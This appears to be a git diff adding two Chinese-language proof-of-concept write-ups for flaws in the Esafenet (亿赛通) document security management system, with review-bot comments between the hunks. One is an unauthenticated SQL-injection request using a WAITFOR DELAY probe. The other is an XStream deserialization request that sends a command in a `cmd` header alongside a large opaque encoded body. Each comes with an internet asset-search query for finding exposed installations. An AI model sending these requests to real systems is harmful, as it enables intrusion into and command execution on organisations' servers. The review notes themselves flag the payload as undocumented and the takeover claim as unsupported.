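Review bot: the body of this request is an opaque string of roughly 14 KB over the letters A–P, sent as `Content-Type: text/xml` although it is not XML, and nothing in the file says what it encodes, how it was produced, or how it relates to the `cmd: whoami` header; as written a reader cannot regenerate it for another command or verify that it is the XStream payload the title announces. Document the encoding or link the tool that emits it, state that the body is fixed and the header carries the command (if that is the case), and describe what a successful response looks like beyond the single screenshot. Also replace the lab address in `Host: 192.168.110.187:8090` with a placeholder, as the other requests in this set leave `Host:` blank.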
+++ b/亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞 + +亿某通电子文档安全管理系统` SecureUsbService`接口的`id`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-电子文档安全管理系统" +``` + +## poc + +```javascript +POST /CDGServer3/device/SecureUsbService;login HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=DelSecureUsb&id=a';WAITFOR+DELAY+'0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..52f090b --- /dev/null +++ b/亿赛通电子文档安全管理系统SystemService存在xstream反序列化漏洞.md 
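Review bot: the description says an attacker may "直接获取服务器权限" (directly take control of the server), but the only evidence in the write-up is a time-based probe, `command=DelSecureUsb&id=a';WAITFOR+DELAY+'0:0:5'--`, which shows a 5-second delay on an MSSQL backend and nothing more; either show what supports the takeover claim or limit the text to what is demonstrated. Smaller points: the description anonymizes the vendor as `亿某通` while the title says `亿赛通`; the request fence is tagged `javascript` and the fofa query `yaml` although both are plain text; this file lacks the 漏洞简介/影响版本/资产测绘/漏洞复现 sections used by the neighbouring write-ups; and the `;login` suffix in `POST /CDGServer3/device/SecureUsbService;login` is never explained, so say whether it is what makes the endpoint reachable without authentication, and drop it if it is not.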
@@ -0,0 +1,60 @@ +# 亿赛通电子文档安全管理系统SystemService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统SystemService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Ee_yrEjypi5abc_7/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-850395.png) + +# 四、漏洞复现 +```java +POST /CDGServer3/SystemService?command=GETSYSTEMINFO HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILN
GBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDB
DJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAH
IGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJ
KBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJ
LLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKN
MEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJ
LHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCN